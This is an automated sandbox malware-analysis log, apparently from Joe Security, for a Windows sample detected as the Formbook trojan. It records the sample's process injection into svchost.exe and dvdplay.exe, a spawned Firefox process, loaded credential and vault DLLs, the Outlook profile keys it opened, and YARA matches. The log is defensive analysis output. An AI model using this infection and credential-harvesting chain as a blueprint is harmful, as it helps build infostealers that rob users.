            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0361EFA03_2_0361EFA0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A0E593_2_035A0E59
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365EE263_2_0365EE26
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365EEDB3_2_0365EEDB
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035B2E903_2_035B2E90
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365CE933_2_0365CE93
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035AAD003_2_035AAD00
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0363CD1F3_2_0363CD1F
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0359ADE03_2_0359ADE0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035B8DBF3_2_035B8DBF
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A0C003_2_035A0C00
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03590CF23_2_03590CF2
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03640CB53_2_03640CB5
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0358D34C3_2_0358D34C
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365132D3_2_0365132D
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035E739A3_2_035E739A
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036412ED3_2_036412ED
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BB2C03_2_035BB2C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BD2F03_2_035BD2F0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A52A03_2_035A52A0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0366B16B3_2_0366B16B
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0358F1723_2_0358F172
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D516C3_2_035D516C
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035AB1B03_2_035AB1B0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365F0E03_2_0365F0E0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036570E93_2_036570E9
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A70C03_2_035A70C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0364F0CC3_2_0364F0CC
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365F7B03_2_0365F7B0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035E56303_2_035E5630
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036516CC3_2_036516CC
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036575713_2_03657571
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036695C33_2_036695C3
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0363D5B03_2_0363D5B0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035914603_2_03591460
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365F43F3_2_0365F43F
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FB763_2_0365FB76
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03615BF03_2_03615BF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035DDBF93_2_035DDBF9
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BFB803_2_035BFB80
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03613A6C3_2_03613A6C
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03657A463_2_03657A46
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FA493_2_0365FA49
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0364DAC63_2_0364DAC6
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03641AA33_2_03641AA3
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0363DAAC3_2_0363DAAC
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035E5AA03_2_035E5AA0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A99503_2_035A9950
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BB9503_2_035BB950
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036359103_2_03635910
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0360D8003_2_0360D800
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A38E03_2_035A38E0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FF093_2_0365FF09
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03563FD53_2_03563FD5
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03563FD23_2_03563FD2
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A1F923_2_035A1F92
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FFB13_2_0365FFB1
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A9EB03_2_035A9EB0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03657D733_2_03657D73
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A3D403_2_035A3D40
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03651D5A3_2_03651D5A
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BFDC03_2_035BFDC0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03619C323_2_03619C32
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365FCF23_2_0365FCF2
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B31BF03_2_00B31BF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B2CAE03_2_00B2CAE0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B2AD803_2_00B2AD80
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B2CD003_2_00B2CD00
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B352C03_2_00B352C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B334903_2_00B33490
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B3348D3_2_00B3348D
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B4BA703_2_00B4BA70
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_033BE3383_2_033BE338
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_033BE7ED3_2_033BE7ED
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_033BE4543_2_033BE454
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_033BD8583_2_033BD858
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: String function: 0360EA12 appears 86 times
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: String function: 0358B970 appears 262 times
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: String function: 035D5130 appears 58 times
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: String function: 0361F290 appears 103 times
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: String function: 035E7E54 appears 107 times
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 107 times
            Source: H1CYDJ8LQe.exe, 00000000.00000003.1680075472.0000000004693000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs H1CYDJ8LQe.exe
            Source: H1CYDJ8LQe.exe, 00000000.00000003.1680680234.000000000483D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs H1CYDJ8LQe.exe
            Source: H1CYDJ8LQe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/6
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeFile created: C:\Users\user\AppData\Local\Temp\slashingJump to behavior
            Source: H1CYDJ8LQe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: dvdplay.exe, 00000003.00000002.3526191845.0000000003181000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.2052355465.0000000003181000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: H1CYDJ8LQe.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeFile read: C:\Users\user\Desktop\H1CYDJ8LQe.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\H1CYDJ8LQe.exe "C:\Users\user\Desktop\H1CYDJ8LQe.exe"
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\H1CYDJ8LQe.exe"
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeProcess created: C:\Windows\SysWOW64\dvdplay.exe "C:\Windows\SysWOW64\dvdplay.exe"
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\H1CYDJ8LQe.exe"Jump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeProcess created: C:\Windows\SysWOW64\dvdplay.exe "C:\Windows\SysWOW64\dvdplay.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: H1CYDJ8LQe.exeStatic file information: File size 1517995 > 1048576
            Source: Binary string: dvdplay.pdbGCTL source: svchost.exe, 00000001.00000002.1862870444.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1862889809.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000002.3526788832.0000000001398000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SwTeWVAxKdsP.exe, 00000002.00000000.1764960932.00000000004BE000.00000002.00000001.01000000.00000004.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3526375024.00000000004BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: H1CYDJ8LQe.exe, 00000000.00000003.1678980011.0000000004710000.00000004.00001000.00020000.00000000.sdmp, H1CYDJ8LQe.exe, 00000000.00000003.1678801980.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750211424.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1748581643.0000000003000000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1866640503.00000000031F8000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1869028004.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.0000000003560000.00000040.00001000.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.00000000036FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: H1CYDJ8LQe.exe, 00000000.00000003.1678980011.0000000004710000.00000004.00001000.00020000.00000000.sdmp, H1CYDJ8LQe.exe, 00000000.00000003.1678801980.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1863300462.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750211424.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1748581643.0000000003000000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, dvdplay.exe, 00000003.00000003.1866640503.00000000031F8000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1869028004.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.0000000003560000.00000040.00001000.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.00000000036FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dvdplay.pdb source: svchost.exe, 00000001.00000002.1862870444.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1862889809.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000002.3526788832.0000000001398000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527827023.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942597721.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2163541700.000000001D2EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527827023.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942597721.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2163541700.000000001D2EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: H1CYDJ8LQe.exeStatic PE information: real checksum: 0xa961f should be: 0x173b90
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041184F push es; retf 1_2_0041185E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D072 push 1F301B76h; ret 1_2_0040D07C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004250E3 push edi; ret 1_2_004250EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A967 push cs; iretd 1_2_0041A977
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D1E0 push ebp; retf 1_2_0040D1F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004019E4 push ebp; retf 1_2_004019E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401A44 pushfd ; iretd 1_2_00401A58
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414A65 push edx; retf 1_2_00414A66
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041F27F push ss; retf 1_2_0041F29A
